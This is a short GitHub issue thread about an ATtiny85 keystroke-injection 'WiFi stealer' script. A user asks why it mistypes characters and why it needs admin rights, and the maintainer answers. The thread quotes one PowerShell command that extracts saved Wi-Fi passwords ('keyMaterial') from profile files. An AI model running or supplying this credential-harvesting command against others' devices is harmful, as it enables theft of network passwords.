### ISSUE TITLE
Wrong Typing

### ISSUE THREAD

**Issue by flaryx32** [MTK911/Attiny85#14]
Hello, in the cmd it gets typed "keyiclear" instead of "key=clear" and there ore some other miss spelled words, how to fix that?

**Comment by flaryx32** [comment]
forgot to say that this happens on the WiFi stealer

**Comment by MTK911** [comment]
It sounds like the issue is with your keyboard layout or language. Please check if the keyboard is in US English and layout is in QWERTY. If you're using different language or layout you have to customize the script accordingly.

**Comment by flaryx32** [comment]
I have manually changed the library binds, but the script requires admin password to work, like `powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS ` needs admins  permissions.

**Comment by MTK911** [comment]
Haven't seen this happening normally unless you are on an AD domain and policies are in place. Sorry can't help you with that.
